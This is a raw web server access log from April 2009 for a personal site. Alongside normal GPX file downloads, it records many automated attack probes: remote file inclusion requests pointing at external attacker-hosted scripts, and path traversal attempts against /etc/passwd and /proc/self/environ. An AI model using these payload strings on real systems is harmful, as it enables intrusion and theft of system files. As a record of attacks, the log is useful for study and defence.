85.119.154.129 - - [28/Apr/2009:09:17:30 -0700] "GET /logs/index.php?url=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.119.154.129 - - [28/Apr/2009:09:17:30 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.119.154.129 - - [28/Apr/2009:09:17:31 -0700] "GET /logs/index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
85.119.154.129 - - [28/Apr/2009:09:17:31 -0700] "GET /logs/index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:17:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:41 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:44 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.154.129 - - [28/Apr/2009:09:17:45 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:17:49 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:18:05 -0700] "GET /logs/access_080303.log/popup.php?path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:18:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:18:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
85.119.154.129 - - [28/Apr/2009:09:18:14 -0700] "GET /index.php?url=http://www.kvsc.ru/files/i?? HTTP/1.1" 200 43263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:18:49 -0700] "GET /logs/access_081011.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:18:49 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:18:49 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:18:49 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:18:53 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
216.93.240.34 - - [28/Apr/2009:09:19:17 -0700] "GET /logs/access_080521.log/xmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:09:19:18 -0700] "GET /logs/access_080817.log%20%20/popup.php?path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:09:19:18 -0700] "GET /logs/popup.php?path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:09:19:18 -0700] "GET /popup.php?path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:19:21 -0700] "GET /logs/access_081222.log//index.php?dat=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:19:21 -0700] "GET /logs//index.php?dat=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:19:22 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:09:19:22 -0700] "GET /logs/access_080303.log%20%20/popup.php?path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.119.154.129 - - [28/Apr/2009:09:19:27 -0700] "GET /index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 - "-" "XXXXXX" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:19:37 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
85.119.154.129 - - [28/Apr/2009:09:19:37 -0700] "GET /index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 43467 "-" "XXXXXX" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:19:55 -0700] "GET /logs/access_090217.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:20:01 -0700] "GET /index.php?dat=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 500 292 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.23.152 - - [28/Apr/2009:09:20:13 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [28/Apr/2009:09:20:17 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:20:19 -0700] "GET /logs/access_081026.log%20%20//admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:20:25 -0700] "GET /logs/access_090301.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:20:29 -0700] "GET /logs/access_090217.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:32 -0700] "GET /logs/access_081012.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:32 -0700] "GET /logs/access_081012.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:33 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:33 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:20:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:20:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:20:34 -0700] "GET /logs/access_090103.log//?sIncPath=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:20:34 -0700] "GET /logs//?sIncPath=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 200 97193 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:36 -0700] "GET /logs/access_081012.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:36 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:09:20:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:36 -0700] "GET /logs/access_081012.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:36 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:40 -0700] "GET /logs/access_081008.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:20:41 -0700] "GET /logs/access_081026.log//admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:20:42 -0700] "GET /logs/access_090314.log//?sIncPath=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:43 -0700] "GET /logs/access_081008.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:43 -0700] "GET /logs/access_081008.log%20%20/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:43 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:44 -0700] "GET /logs/access_081008.log%20%20/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:44 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:49 -0700] "GET /logs/access_081012.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:49 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:09:20:53 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:20:53 -0700] "GET /logs/access_081008.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:09:20:58 -0700] "GET /logs/access_090122.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:09:20:58 -0700] "GET /logs//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:21:03 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:21:05 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:21:09 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:21:09 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:21:16 -0700] "GET /logs/access_080720.log%20%20/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:21:17 -0700] "GET /logs/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:21:20 -0700] "GET /logs/access_080720.log%20%20/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:21:20 -0700] "GET /logs/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:21:21 -0700] "GET /?sIncPath=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 200 43278 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:21:30 -0700] "GET /logs/access_080925.log%20%20/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:21:30 -0700] "GET /logs/access_081012.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:21:30 -0700] "GET /logs/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:21:31 -0700] "GET /logs/access_080925.log%20%20/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:21:34 -0700] "GET /logs/access_081008.log/?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:09:21:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:21:46 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 43282 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:21:47 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 43282 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:09:22:00 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:22:00 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:22:00 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.0" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:22:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:22:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:22:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:22:16 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:22:17 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:22:25 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:22:29 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:22:30 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:09:22:33 -0700] "GET /index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:22:35 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:22:58 -0700] "GET /?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:23:02 -0700] "GET /?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:23:06 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:23:06 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fortuna-mebel.ru/1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:23:06 -0700] "GET /logs/access_090108.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:23:11 -0700] "GET /logs/access_081223.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.137.160.91 - - [28/Apr/2009:09:23:11 -0700] "GET /?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:23:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:23:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:24:18 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:24:19 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:22 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:22 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:22 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:22 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:22 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:22 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:27 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:27 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:27 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:27 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:27 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:27 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:35 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:35 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:37 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:37 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:37 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:38 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:38 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:24:38 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:24:39 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:24:39 -0700] "GET /logs/access_081223.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:24:39 -0700] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:24:42 -0700] "GET /logs/access_090108.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:24:43 -0700] "GET /logs/access_081223.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:25:05 -0700] "GET /logs/access_080802.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:25:05 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
